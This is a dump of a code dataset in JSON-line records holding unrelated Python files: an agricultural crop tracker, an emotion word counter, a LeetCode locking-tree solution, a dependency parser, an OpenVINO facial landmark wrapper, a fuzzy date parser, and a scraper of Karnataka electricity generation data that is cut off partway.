(float, optional): the minimum IOU for match.\n \"\"\"\n self.camera = camera\n self.max_age = max_age\n self.min_hits = min_hits\n self.iou_threshold = iou_threshold\n\n self.trackers = []\n self.frame_count = 0\n\n def step(\n self,\n sequence: AgriculturalSequence\n ) -> npt.ArrayLike:\n \"\"\"\n Executes the tracker step.\n\n Args:\n sequence (:obj:`features_3d.agriculture.AgriculturalSequence`): the sequence\n object that contains all the information about the scenes.\n\n Returns:\n tracked_bbox (:obj:`np.ndarray`): containing the tracked bounding boxes.\n \"\"\"\n\n self.frame_count += 1\n\n # Update crops with the 2D motion offset from extrinsics\n self.get_crops_motion(sequence)\n\n # Load information about the Kalman filter prediction step of existing trackers.\n # Also checks if the prediction is valid. If not, saves the tracker index to\n # remove it later. \n trackers_data = np.zeros((len(self.trackers), 5))\n to_delete_existing_trackers_idxs = []\n for t, tracker_data in enumerate(trackers_data):\n prediction = self.trackers[t].predict(\n self.trackers[t].crops[-1].estimated_motion_2d\n )[0]\n tracker_data[:] = [\n prediction[0], prediction[1], prediction[2], prediction[3], 0\n ]\n\n if np.any(np.isnan(prediction)):\n to_delete_existing_trackers_idxs.append(t)\n\n # Filter the extracted data from existing trackers.\n trackers_data = np.ma.compress_rows(np.ma.masked_invalid(trackers_data))\n\n # Filter the trackers that does not result in good\n for t in reversed(to_delete_existing_trackers_idxs):\n self.trackers.pop(t)\n\n detections = np.array([crop.crop_box.data for crop in sequence.scenes[-1].crop_group.crops])\n if not detections.any():\n detections = np.empty((0, 5))\n\n matched, unmatched_detections, unmatched_trackers = self._associate_detections_to_trackers(\n detections,\n trackers_data,\n self.iou_threshold\n )\n\n # For each founded correspondence, runs the Kalman filter correction step.\n # Also adds the current crop to the tracker.\n for m in matched:\n last_box = self.trackers[m[1]].crops[-1].crop_box.data\n current_box = detections[m[0], :]\n diff_2d = np.array(current_box[:2] - last_box[:2])\n \n observation = np.concatenate([current_box, diff_2d])\n self.trackers[m[1]].update(observation)\n\n # Adds the crop to the tracker. \n self.trackers[m[1]].crops.append(sequence.scenes[-1].crop_group.crops[m[0]])\n self.trackers[m[1]].crops[-1].cluster = self.trackers[m[1]].id\n\n # Create and initialise new trackers for unmatched detections.\n for u in unmatched_detections:\n tracker = KalmanBoxTracker(\n sequence.scenes[-1].crop_group.crops[u]\n )\n self.trackers.append(tracker)\n\n # Filter the existing trackers by max_age and min_hits.\n ret = []\n t = len(self.trackers)\n for tracker in reversed(self.trackers):\n if tracker.time_since_update < 1:\n if (tracker.hit_streak >= self.min_hits) or (self.frame_count <= self.min_hits):\n d = tracker.get_state()[0]\n\n # # Modify the crop's clusters to match tracker ID.\n # for crop in tracker.crops:\n # crop.cluster = tracker.id\n\n ret.append(\n np.concatenate(\n (d, [tracker.id])\n ).reshape(1,-1)\n ) \n t -= 1\n\n if tracker.time_since_update > self.max_age:\n self.trackers.pop(t)\n\n if len(ret) > 0:\n return np.concatenate(ret)\n else:\n return np.empty((0, 5))\n \n def _iou_batch(\n self,\n bb_test: npt.ArrayLike,\n bb_gt: npt.ArrayLike\n ) -> npt.ArrayLike:\n \"\"\"\n Computes the IOU metric between two bounding boxes in the form [x1, y1, x2, y2].\n\n Args:\n bb_test (:obj:`np.ndarray`): the first bounding box.\n bb_gt (:obj:`np.ndarray`): the second bounding box.\n\n Returns:\n iou_values (:obj:`np.ndarray`): containing the IOU metric from each \n tracker/detection pair.\n \"\"\"\n bb_gt = np.expand_dims(bb_gt, 0)\n bb_test = np.expand_dims(bb_test, 1)\n \n xx1 = np.maximum(bb_test[..., 0], bb_gt[..., 0])\n yy1 = np.maximum(bb_test[..., 1], bb_gt[..., 1])\n xx2 = np.minimum(bb_test[..., 2], bb_gt[..., 2])\n yy2 = np.minimum(bb_test[..., 3], bb_gt[..., 3])\n w = np.maximum(0., xx2 - xx1)\n h = np.maximum(0., yy2 - yy1)\n wh = w * h\n o = wh / ((bb_test[..., 2] - bb_test[..., 0]) * (bb_test[..., 3] - bb_test[..., 1]) \n + (bb_gt[..., 2] - bb_gt[..., 0]) * (bb_gt[..., 3] - bb_gt[..., 1]) - wh) \n \n return(o)\n \n def _linear_assignment(\n self,\n cost_matrix: npt.ArrayLike\n ) -> npt.ArrayLike: \n \"\"\"\n Calculates the best detection/trackers correspondence.\n \n Args:\n cost_matrix (:obj:`np.ndarray`) containing negative IOU values\n for each detection and tracker pair.\n\n Returns:\n matches (:obj:`np.ndarray`): each line indicates a correspondance \n between the first column (detection) and the second one (tracker).\n \"\"\"\n x, y = linear_sum_assignment(cost_matrix)\n return np.array(list(zip(x, y)))\n\n def _associate_detections_to_trackers(\n self,\n detections: npt.ArrayLike,\n trackers_data: npt.ArrayLike,\n iou_threshold: float\n ) -> Tuple[npt.ArrayLike, npt.ArrayLike, npt.ArrayLike]:\n \"\"\"\n Associates the detections to the existing trackers.\n\n Args:\n detections (:obj:`np.ndarray`): the bounding boxes detected in\n the current frame.\n trackers_data (:obj:`np.ndarray`): the existing bounding boxes\n from the existing trackers.\n iou_threshold (float): the minimum IOU for match.\n\n Returns:\n matches (:obj:`np.ndarray`): the matches between detections and trackers.\n unmatched_detections (:obj:`np.ndarray`): the unmatched detections.\n unmatched trackers (:obj:`np.ndarray`): the unmatched trackers.\n \"\"\"\n\n # If there is not any tracker yet, just return all detections\n # as unmatched ones.\n if len(trackers_data) == 0:\n matched = np.empty((0, 2), dtype=int)\n unmatched_detections = np.arange(len(detections))\n unmatched_trackers = np.empty((0, 5), dtype=int)\n return matched, unmatched_detections, unmatched_trackers\n \n # If there are already some trackers, check their IOU metric\n # with the provided detections\n iou_matrix = self._iou_batch(detections, trackers_data)\n\n matched_idxs = None\n # Checks if there are detections and trackers overlapping\n if min(iou_matrix.shape) > 0:\n a = (iou_matrix > iou_threshold).astype(np.int32)\n\n # Checks if there is only one good detection and tracker correspondence.\n if a.sum(1).max() == 1 and a.sum(0).max() == 1:\n matched_idxs = np.stack(np.where(a), axis=1)\n else:\n # If not, try to find the better correspondence with Jonker-Volgenant algorithm.\n matched_idxs = self._linear_assignment(-iou_matrix)\n else:\n # If not, just return a empty Numpy array.\n matched_idxs = np.empty((0, 2))\n\n # Finds the the detections that don't have a tracker correspondence.\n unmatched_detections = []\n for d, detection in enumerate(detections):\n if d not in matched_idxs[:, 0]:\n unmatched_detections.append(d)\n\n # Finds the the trackers that don't have a detection correspondence.\n unmatched_trackers = []\n for t, tracker in enumerate(trackers_data):\n if t not in matched_idxs[:, 1]:\n unmatched_trackers.append(t)\n\n matches = []\n for m in matched_idxs:\n #Filters the matches that have low IOU (when linear_assignment was used)\n if iou_matrix[m[0], m[1]] < iou_threshold:\n unmatched_detections.append(m[0])\n unmatched_trackers.append(m[1])\n else:\n matches.append(m.reshape(1, 2))\n\n if len(matches) == 0:\n matches = np.empty((0, 2), dtype=int)\n else:\n matches = np.concatenate(matches, axis=0)\n\n return matches, np.array(unmatched_detections), np.array(unmatched_trackers)\n\n def get_crops_motion(\n self,\n sequence: AgriculturalSequence\n ) -> None:\n \"\"\"\n Calculates a prediction of the crop's position using extrinsics information.\n\n Args:\n sequence (:obj:`features_3d.sequence.AgriculturalSequence`): object that\n contains all the crop information during several scenes.\n \"\"\"\n if len(sequence.scenes) > 1:\n current_scene = sequence.scenes[-1]\n prev_scene = sequence.scenes[-2]\n\n # Get the transformation between the two consecutive scenes and converts it back to origin frame.\n shift_transform = np.linalg.inv(current_scene.extrinsics) @ current_scene.extrinsics @ np.linalg.inv(prev_scene.extrinsics)\n\n # print('self.camera.size = ', self.camera.size)\n\n # For each crop in the previous scene, apply the transformation in the average point.\n # Calculates the difference between the previous average point with the transformed one.\n # Project this difference back into the 2D image plane.\n for prev_crop in prev_scene.crop_group.crops:\n # Apply the shift to the average point\n shifted_avg_point = shift_transform @ np.append(prev_crop.average_point, 1)\n shifted_2d_point = self.camera.get_2d_point(shifted_avg_point)\n\n # print('prev_crop.average_point = ', prev_crop.average_point)\n # print('shifted_avg_point = ', shifted_avg_point)\n # print('shifted_2d_point = ', shifted_2d_point)\n \n prev_box = prev_crop.crop_box.data\n box_center_x = np.average([prev_box[0], prev_box[2]])\n box_center_y = np.average([prev_box[1], prev_box[3]])\n box_center = np.array([box_center_x, box_center_y])\n\n # print('box_center = ', box_center)\n\n diff_2d = shifted_2d_point - box_center\n prev_crop.estimated_motion_2d = diff_2d\n # print('diff_2d = ', diff_2d)\n\n # Correcting direction of the movement.\n # prev_box = prev_crop.crop_box.data\n # if box_center[0] > self.camera.size[0]/2:\n # prev_crop.estimated_motion_2d[0] *= -1.\n\n # Forces the array to be 2D to avoid problems when doing matrix multiplication.\n prev_crop.estimated_motion_2d = prev_crop.estimated_motion_2d[:, None]\n","repo_name":"toschilt/ts_semantic_feature_detector","sub_path":"src/ts_semantic_feature_detector/features_2d/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":20113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19831251867","text":"\r\n# cleaning the text :\r\n# making sure everything is in lower case\r\n# remove all the punctuations\r\n#make trans - make transformations 3 arg - 'char to replace' 'char to replace w' 'char to delete'\r\n\r\n\r\nimport string\r\nfrom collections import Counter\r\nimport matplotlib.pyplot as plt\r\n\r\n#cleaning the words\r\n\r\ntext = open('read.txt',encoding='utf-8').read()\r\nlower_case=text.lower()\r\nprint(lower_case)\r\ncleaned_text = lower_case.translate(str.maketrans('','',string.punctuation))\r\nprint(cleaned_text)\r\n\r\n# tokenization breaks the string into small chunks called tokens that helps understanding the context\r\n#stop words are words that basically don't add any meaning to the sentence\r\n#NLTK has ready-made stop words\r\n\r\ntokenized_words=cleaned_text.split()\r\nprint(tokenized_words)\r\n\r\nstop_words = [\"i\", \"me\", \"my\", \"myself\", \"we\", \"our\", \"ours\", \"ourselves\", \"you\", \"your\", \"yours\", \"yourself\",\r\n \"yourselves\", \"he\", \"him\", \"his\", \"himself\", \"she\", \"her\", \"hers\", \"herself\", \"it\", \"its\", \"itself\",\r\n \"they\", \"them\", \"their\", \"theirs\", \"themselves\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"these\",\r\n \"those\", \"am\", \"is\", \"are\", \"was\", \"were\", \"be\", \"been\", \"being\", \"have\", \"has\", \"had\", \"having\", \"do\",\r\n \"does\", \"did\", \"doing\", \"a\", \"an\", \"the\", \"and\", \"but\", \"if\", \"or\", \"because\", \"as\", \"until\", \"while\",\r\n \"of\", \"at\", \"by\", \"for\", \"with\", \"about\", \"against\", \"between\", \"into\", \"through\", \"during\", \"before\",\r\n \"after\", \"above\", \"below\", \"to\", \"from\", \"up\", \"down\", \"in\", \"out\", \"on\", \"off\", \"over\", \"under\", \"again\",\r\n \"further\", \"then\", \"once\", \"here\", \"there\", \"when\", \"where\", \"why\", \"how\", \"all\", \"any\", \"both\", \"each\",\r\n \"few\", \"more\", \"most\", \"other\", \"some\", \"such\", \"no\", \"nor\", \"not\", \"only\", \"own\", \"same\", \"so\", \"than\",\r\n \"too\", \"very\", \"s\", \"t\", \"can\", \"will\", \"just\", \"don\", \"should\", \"now\"]\r\n\r\nfinal_words=[]\r\nfor word in tokenized_words:\r\n if word not in stop_words:\r\n final_words.append(word)\r\n\r\nprint(final_words)\r\n\r\n#NLP algo\r\n#check if the final word is present in the emo text file\r\n#if present add emo to emotion_list\r\n#count each emotion in the emotion_list\r\n\r\nemotion_list=[]\r\n\r\nwith open('emotions.txt', 'r') as file:\r\n for line in file:\r\n clear_line = line.replace(\"\\n\", '').replace(\",\", '').replace(\"'\", '').strip()\r\n word, emotion = clear_line.split(':')\r\n\r\n if word in final_words:\r\n emotion_list.append(emotion)\r\n\r\nprint(emotion_list)\r\nw = Counter(emotion_list)\r\nprint(w)\r\n\r\nfig, ax1 = plt.subplots()\r\nax1.bar(w.keys(),w.values())\r\nfig.autofmt_xdate() #too automatically format the x-axis to acc all the emotions\r\nplt.savefig('graph.png')\r\nplt.show()\r\n\r\n#use zuck, steve job's speeches to class\r\n","repo_name":"bazyagami/NLTK-usages","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1640635342","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass LockingTree:\n\n def __init__(self, parent: List[int]):\n self.locked = dict()\n self.parent = parent\n self.adj_list = defaultdict(list)\n for ind, node in enumerate(self.parent):\n self.adj_list[node].append(ind)\n\n def is_locked(self, node):\n return node in self.locked\n\n def lock(self, num: int, user: int) -> bool:\n if num in self.locked:\n return False\n self.locked[num] = user\n return True\n\n def unlock(self, num: int, user: int) -> bool:\n if num not in self.locked or self.locked[num] != user:\n return False\n self.locked.pop(num)\n return True\n\n def check_if_child_booked(self, node):\n stack = [node]\n\n while stack:\n node = stack.pop()\n for child in self.adj_list[node]:\n if self.is_locked(child):\n return True\n stack.append(child)\n\n return False\n\n def has_locked_ancestor(self, node):\n stack = [node]\n\n while stack:\n node = stack.pop()\n parent = self.parent[node]\n if self.is_locked(parent):\n return True\n if parent > 0:\n stack.append(parent)\n return False\n\n def unlock_descendents(self, node):\n stack = [node]\n\n while stack:\n node = stack.pop()\n for child in self.adj_list[node]:\n if self.is_locked(child):\n self.locked.pop(child)\n stack.append(child)\n\n def upgrade(self, num: int, user: int) -> bool:\n if self.is_locked(num) or not self.check_if_child_booked(num) or self.has_locked_ancestor(num):\n return False\n\n self.lock(num, user)\n self.unlock_descendents(num)\n return True\n\n\nif __name__ == '__main__':\n lockingTree = LockingTree([-1, 0, 0, 1, 1, 2, 2])\n lockingTree.lock(2, 2)\n lockingTree.unlock(2, 3)\n lockingTree.unlock(2, 2)\n lockingTree.lock(4, 5)\n lockingTree.upgrade(0, 1)\n lockingTree.lock(0, 1)","repo_name":"amogchandrashekar/Leetcode","sub_path":"Medium/Operations on Tree.py","file_name":"Operations on Tree.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71037470275","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Iterable, Union\n\nimport torch\nfrom supar.config import Config\nfrom supar.models.dep.biaffine.parser import BiaffineDependencyParser\nfrom supar.models.dep.vi.model import VIDependencyModel\nfrom supar.utils.fn import ispunct\nfrom supar.utils.logging import get_logger\nfrom supar.utils.metric import AttachmentMetric\nfrom supar.utils.transform import Batch\n\nlogger = get_logger(__name__)\n\n\nclass VIDependencyParser(BiaffineDependencyParser):\n r\"\"\"\n The implementation of Dependency Parser using Variational Inference :cite:`wang-tu-2020-second`.\n \"\"\"\n\n NAME = 'vi-dependency'\n MODEL = VIDependencyModel\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def train(\n self,\n train: Union[str, Iterable],\n dev: Union[str, Iterable],\n test: Union[str, Iterable],\n epochs: int = 1000,\n patience: int = 100,\n batch_size: int = 5000,\n update_steps: int = 1,\n buckets: int = 32,\n workers: int = 0,\n amp: bool = False,\n cache: bool = False,\n punct: bool = False,\n tree: bool = False,\n proj: bool = False,\n partial: bool = False,\n verbose: bool = True,\n **kwargs\n ):\n return super().train(**Config().update(locals()))\n\n def evaluate(\n self,\n data: Union[str, Iterable],\n batch_size: int = 5000,\n buckets: int = 8,\n workers: int = 0,\n amp: bool = False,\n cache: bool = False,\n punct: bool = False,\n tree: bool = True,\n proj: bool = True,\n partial: bool = False,\n verbose: bool = True,\n **kwargs\n ):\n return super().evaluate(**Config().update(locals()))\n\n def predict(\n self,\n data: Union[str, Iterable],\n pred: str = None,\n lang: str = None,\n prob: bool = False,\n batch_size: int = 5000,\n buckets: int = 8,\n workers: int = 0,\n amp: bool = False,\n cache: bool = False,\n tree: bool = True,\n proj: bool = True,\n verbose: bool = True,\n **kwargs\n ):\n return super().predict(**Config().update(locals()))\n\n def train_step(self, batch: Batch) -> torch.Tensor:\n words, _, *feats, arcs, rels = batch\n mask = batch.mask\n # ignore the first token of each sentence\n mask[:, 0] = 0\n s_arc, s_sib, s_rel = self.model(words, feats)\n loss, *_ = self.model.loss(s_arc, s_sib, s_rel, arcs, rels, mask)\n return loss\n\n @torch.no_grad()\n def eval_step(self, batch: Batch) -> AttachmentMetric:\n words, _, *feats, arcs, rels = batch\n mask = batch.mask\n # ignore the first token of each sentence\n mask[:, 0] = 0\n s_arc, s_sib, s_rel = self.model(words, feats)\n loss, s_arc = self.model.loss(s_arc, s_sib, s_rel, arcs, rels, mask)\n arc_preds, rel_preds = self.model.decode(s_arc, s_rel, mask, self.args.tree, self.args.proj)\n if self.args.partial:\n mask &= arcs.ge(0)\n # ignore all punctuation if not specified\n if not self.args.punct:\n mask.masked_scatter_(mask, ~mask.new_tensor([ispunct(w) for s in batch.sentences for w in s.words]))\n return AttachmentMetric(loss, (arc_preds, rel_preds), (arcs, rels), mask)\n\n @torch.no_grad()\n def pred_step(self, batch: Batch) -> Batch:\n words, _, *feats = batch\n mask, lens = batch.mask, (batch.lens - 1).tolist()\n # ignore the first token of each sentence\n mask[:, 0] = 0\n s_arc, s_sib, s_rel = self.model(words, feats)\n s_arc = self.model.inference((s_arc, s_sib), mask)\n arc_preds, rel_preds = self.model.decode(s_arc, s_rel, mask, self.args.tree, self.args.proj)\n batch.arcs = [i.tolist() for i in arc_preds[mask].split(lens)]\n batch.rels = [self.REL.vocab[i.tolist()] for i in rel_preds[mask].split(lens)]\n if self.args.prob:\n batch.probs = [prob[1:i+1, :i+1].cpu() for i, prob in zip(lens, s_arc.unbind())]\n return batch\n","repo_name":"yzhangcs/parser","sub_path":"supar/models/dep/vi/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":785,"dataset":"github-code","pt":"61"} +{"seq_id":"75113603074","text":"import cv2\r\nfrom openvino.inference_engine import IENetwork, IECore\r\nimport numpy as np\r\nimport os\r\n\r\n# This class is used for Facial Landmarks Detection Model\r\n\r\nclass Model_LandmarkDetection:\r\n\r\n #Intializing the instance\r\n def __init__(self, model_name, device='CPU', extensions=None):\r\n self.model_name, self.device = model_name, device\r\n self.core, self.extensions = IECore(), extensions\r\n self.model_structure = self.model_name\r\n self.network = self.core.read_network(model=str(model_name),\r\n weights=str(os.path.splitext(model_name)[0] + \".bin\"))\r\n self.model_weights = self.model_name.split(\".\")[0]+'.bin'\r\n \r\n\r\n def load_model(self):\r\n '''\r\n load_model mothod is for loading the model to the device.\r\n '''\r\n # Initializes the network\r\n # Supported Layers\r\n s_layers = self.core.query_network(network=self.network, device_name=self.device)\r\n \r\n uns_layers = []\r\n for x in self.network.layers.keys():\r\n if x not in s_layers:\r\n uns_layers = x\r\n\r\n l = len(uns_layers)\r\n if l !=0 and self.device=='CPU':\r\n print(\"Layer \"+uns_layers+\" not supported\")\r\n\r\n if not self.extensions==None:\r\n print(\"Add cpu extension layer\")\r\n # Adding extension\r\n add_ext = self.core.add_extension(self.extensions, self.device)\r\n add_ext\r\n # Supported and Unsupported layers\r\n s_layers = self.core.query_network(network = self.network, device_name=self.device)\r\n uns_layers = []\r\n for x in self.network.layers.keys():\r\n if x not in s_layers:\r\n uns_layers = x\r\n if not l==0:\r\n print(\"Layer not supported\")\r\n exit(1)\r\n else:\r\n print(\"Specify path of cpu extension\")\r\n exit(1)\r\n \r\n # Intializing network\r\n load = self.core.load_network(network=self.network, device_name=self.device,num_requests=1)\r\n self.exec_net = load\r\n '''\r\n Oputput name and Output shape\r\n '''\r\n o_name = next(iter(self.network.outputs))\r\n self.op_name = o_name\r\n o_shape = self.network.outputs[self.op_name].shape\r\n self.op_shape = o_shape\r\n '''\r\n Input name and Input shape \r\n '''\r\n i_name = next(iter(self.network.input_info))\r\n self.ip_name = i_name\r\n i_shape = self.network.input_info[self.ip_name].input_data.shape\r\n self.ip_shape = i_shape\r\n \r\n\r\n def check_model(self):\r\n s_layers = IECore().query_network(network=self.network, device_name=self.device)\r\n uns_layers = [layer for layer in self.network.layers.keys() if layer not in s_layers]\r\n if len(uns_layers) > 0:\r\n print(\"Please check extention for these unsupported layers =>\" + str(uns_layers))\r\n exit(1)\r\n print(\"FacialLandmarksDetectionModel layer check\")\r\n\r\n def predict(self, image):\r\n '''\r\n The predtiction method is used to run prediction on images\r\n '''\r\n img = image.copy()\r\n p_img = self.preprocess_input(img)\r\n d_inf = {self.ip_name:p_img}\r\n out = self.exec_net.infer(d_inf) \r\n height, width=image.shape[0], image.shape[1]\r\n coords = ((self.preprocess_output(out))* np.array([width, height, width, height])).astype(np.int32)\r\n # Getting left eye co-ordinates\r\n left_x_min, left_y_min = coords[0]-10, coords[1]-10\r\n left_x_max, left_y_max = coords[0]+10, coords[1]+10\r\n # Getting right eye co-ordinates\r\n right_x_min, right_y_min=coords[2]-10, coords[3]-10\r\n right_x_max, right_y_max=coords[2]+10, coords[3]+10\r\n # Getting left and right eye co-ordinates\r\n l_co_ords, r_co_ords = image[left_y_min:left_y_max, left_x_min:left_x_max], image[right_y_min:right_y_max, right_x_min:right_x_max]\r\n # def get_coords(self,image)\r\n # Getting total co-ordinates\r\n a, b = [left_x_min,left_y_min,left_x_max,left_y_max], [right_x_min,right_y_min,right_x_max,right_y_max]\r\n co_ords= [a,b]\r\n total = co_ords\r\n return l_co_ords, r_co_ords, total\r\n\r\n\r\n def preprocess_input(self, image):\r\n '''\r\n Preprocesses the data before it is fed into inference\r\n '''\r\n conv = cv2.COLOR_BGR2RGB\r\n col = cv2.cvtColor(image, conv)\r\n shape = (self.ip_shape[3], self.ip_shape[2])\r\n res = cv2.resize(col, shape)\r\n x = np.expand_dims(res,axis=0)\r\n array = (0,3,1,2)\r\n p_img = np.transpose(x, array)\r\n return p_img\r\n \r\n\r\n def preprocess_output(self, outputs):\r\n '''\r\n Preprocesses the out put before feeding it to the model\r\n '''\r\n outs = outputs[self.op_name][0]\r\n left_x, left_y = outs[0].tolist()[0][0], outs[1].tolist()[0][0]\r\n right_x, right_y = outs[2].tolist()[0][0], outs[3].tolist()[0][0]\r\n output = (left_x, left_y, right_x, right_y)\r\n return output\r\n","repo_name":"Dhananjayyy/computer-pointer-controller-using-intel-openvino","sub_path":"src/facial_landmark_detection.py","file_name":"facial_landmark_detection.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33740106688","text":"from pyswip import Prolog\nfrom datetime import date\n\n\nclass Engine:\n\n \"\"\"\n A minimal parser for Multilingual Incomplete & Abbreviated Dates\n \"\"\"\n\n def __init__(self, context=date.today()):\n self.context = context.strftime('date(%Y,%m,%d)')\n self.prolog = Prolog()\n next(self.prolog.query(\"use_module(library(abbreviated_dates))\"))\n\n def when(self, time_expression: str):\n \"\"\"\n Explore all possible solutions\n :param time_expression: a time expression in a natural language\n :return: a solution or an empty list\n \"\"\"\n escaped_quotes = time_expression.replace(\"'\", \"''\")\n query = self.prolog.query(f\"parse({self.context}, '{escaped_quotes}', Date, Trace)\")\n return next(iter([self.transform(solution) for solution in query]), ([], []))\n\n @staticmethod\n def transform(solution):\n semantic = [eval(period.value, {'date': date}) for period in solution[\"Date\"]]\n syntax = [trace.value for trace in solution[\"Trace\"]]\n return semantic, syntax\n","repo_name":"open-engines/fuzzy_dates","sub_path":"fuzzy_parser/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19002080955","text":"#!/usr/bin/env python3\n\n# Code generously borrowed from https://github.com/hectorespert/electricitymap/blob/master/parsers/IN_KA.py\n\nfrom requests import Session\nimport helper_methods\nimport pymysql\nimport os\n\n\ndef fetch_production_by_generator(session):\n html = helper_methods.get_response_soup('http://kptclsldc.com/StateGen.aspx', session)\n\n india_date_time = helper_methods.read_datetime_from_span_id(html, 'lbldate', 'M/D/YYYY h:mm:ss A')\n\n generation = {}\n\n generation['timestamp'] = india_date_time.datetime\n\n # RTPS Production: https://en.wikipedia.org/wiki/Raichur_Thermal_Power_Station\n rtps_value = helper_methods.read_value_from_span_id(html, 'lblrtptot')\n generation['rtps_generation'] = rtps_value\n\n # BTPS Production: https://en.wikipedia.org/wiki/Bellary_Thermal_Power_station\n btps_value = helper_methods.read_value_from_span_id(html, 'lblbtptot')\n generation['btps_generation'] = btps_value\n\n # YTPS Production: https://en.wikipedia.org/wiki/Yermarus_Thermal_Power_Station\n ytps_value = helper_methods.read_value_from_span_id(html, 'ytptot')\n generation['ytps_generation'] = ytps_value\n\n # UPCL Production: https://en.wikipedia.org/wiki/Udupi_Power_Plant\n upcl_value = helper_methods.read_value_from_span_id(html, 'lblupctot')\n generation['upcl_generation'] = upcl_value\n\n # Jhelper_methodsDAl Production: https://en.wikipedia.org/wiki/JSW_Vijayanagar_Power_Station\n jindal_value = helper_methods.read_value_from_span_id(html, 'lbljintot')\n generation['jindal_generation'] = jindal_value\n\n # Coal Production\n coal_value = rtps_value + btps_value + ytps_value + upcl_value + jindal_value\n generation['thermal_generation'] = coal_value\n\n # Sharavati Production: Sharavati Hydroelectric\n sharavati_value = helper_methods.read_value_from_span_id(html, 'lblshvytot')\n generation['sharavati_generation'] = sharavati_value\n\n # Nagjhari Production: Kalinadi-Nagjhari Hydroelectric\n nagjhari_value = helper_methods.read_value_from_span_id(html, 'lblngjtot')\n generation['nagjhari_generation'] = nagjhari_value\n\n # Varahi Production: https://en.wikipedia.org/wiki/Varahi_River#Varahi_Hydro-electric_Project\n varahi_value = helper_methods.read_value_from_span_id(html, 'lblvrhtot')\n generation['varahi_generation'] = varahi_value\n\n # Kodsalli Production: Kalinadi Kodasalli Hydroelectric\n kodsalli_value = helper_methods.read_value_from_span_id(html, 'lblkdsltot')\n generation['kodsalli_generation'] = kodsalli_value\n\n # Kadra Production: https://en.wikipedia.org/wiki/Kadra_Dam\n kadra_value = helper_methods.read_value_from_span_id(html, 'lblkdrtot')\n generation['kadra_generation'] = kadra_value\n\n # GERUSOPPA production: Gerusoppa Dam\n gerusoppa_value = helper_methods.read_value_from_span_id(html, 'lblgrsptot')\n generation['gerusoppa_generation'] = gerusoppa_value\n\n # JOG production: https://en.wikipedia.org/wiki/Jog_Falls\n jog_value = helper_methods.read_value_from_span_id(html, 'lbljogtot')\n generation['jog_generation'] = jog_value\n\n # LPH Production: Linganamakki Dam\n lph_value = helper_methods.read_value_from_span_id(html, 'lbllphtot')\n generation['lph_generation'] = lph_value\n\n # Supa generation: https://en.wikipedia.org/wiki/Supa_Dam\n supa_value = helper_methods.read_value_from_span_id(html, 'lblsupatot')\n generation['supa_generation'] = supa_value\n\n # SHIMSHA: https://en.wikipedia.org/wiki/Shimsha#Power_generation\n shimsha_value = helper_methods.read_value_from_span_id(html, 'lblshimtot')\n generation['shimsha_generation'] = shimsha_value\n\n # SHIVASAMUDRA: https://en.wikipedia.org/wiki/Shivanasamudra_Falls#Power_generation\n shivasamudra_value = helper_methods.read_value_from_span_id(html, 'lblshivtot')\n generation['shivasamudra_generation'] = shivasamudra_value\n\n # MANIDAM: Mani Dam Hydroelectric\n manidam_value = helper_methods.read_value_from_span_id(html, 'lblmanitot')\n generation['manidam_generation'] = manidam_value\n\n # MUNRABAD: Munirabad Hydroelectric\n munrabad_value = helper_methods.read_value_from_span_id(html, 'lblmbdtot')\n generation['munrabad_generation'] = munrabad_value\n\n # BHADRA: https://en.wikipedia.org/wiki/Bhadra_Dam\n bhadra_value = helper_methods.read_value_from_span_id(html, 'lblbdratot')\n generation['bhadra_generation'] = bhadra_value\n\n # GHATAPRABHA: Ghataprabha Hydroelectric\n ghataprabha_value = helper_methods.read_value_from_span_id(html, 'lblgtprtot')\n generation['ghataprabha_generation'] = ghataprabha_value\n\n # ALMATTI: https://en.wikipedia.org/wiki/Almatti_Dam\n almatti_value = helper_methods.read_value_from_span_id(html, 'lblalmttot')\n generation['almatti_generation'] = almatti_value\n\n # CGS (Central Generating Stations) Production\n # TODO: Search CGS production type\n cgs_value = helper_methods.read_value_from_span_id(html, 'lblcgs')\n generation['cgs_generation'] = cgs_value\n\n ncep_value = helper_methods.read_value_from_span_id(html, 'lblncep')\n generation['ncep_generation'] = ncep_value\n\n total_value = helper_methods.read_value_from_span_id(html, 'lbltotgen')\n generation['total_generation'] = total_value\n\n frequency_value = helper_methods.read_value_from_span_id(html, 'lblfreq')\n generation['frequency_hz'] = frequency_value\n\n # Hydro production\n hydro_value = sharavati_value + nagjhari_value + varahi_value + kodsalli_value \\\n + kadra_value + gerusoppa_value + jog_value + lph_value + supa_value \\\n + shimsha_value + shivasamudra_value + manidam_value + munrabad_value \\\n + bhadra_value + ghataprabha_value + almatti_value\n generation['hydro_generation'] = hydro_value\n\n return generation\n\n\ndef fetch_ncep_production(session):\n ncep_generation = {}\n\n # NCEP (Non-Conventional Energy Production)\n ncep_html = helper_methods.get_response_soup('http://kptclsldc.com/StateNCEP.aspx', session)\n ncep_date_time = helper_methods.read_datetime_from_span_id(ncep_html, 'Label1', 'DD/MM/YYYY HH:mm:ss')\n\n ncep_generation['timestamp'] = ncep_date_time.datetime\n\n # cogen type is sugarcane bagasee. Proof in Issue #1867\n cogen_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tc')\n ncep_generation['cogen_generation'] = cogen_value\n\n biomass_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tb')\n ncep_generation['biomass_generation'] = biomass_value\n\n # cogen_value is generated from sugarcane bagasse\n biomass_value += cogen_value\n\n mini_hydro_value = helper_methods.read_value_from_span_id(ncep_html, 'lbl_tm')\n ncep_generation['mini_hydro_generation'] = mini_hydro_value\n\n 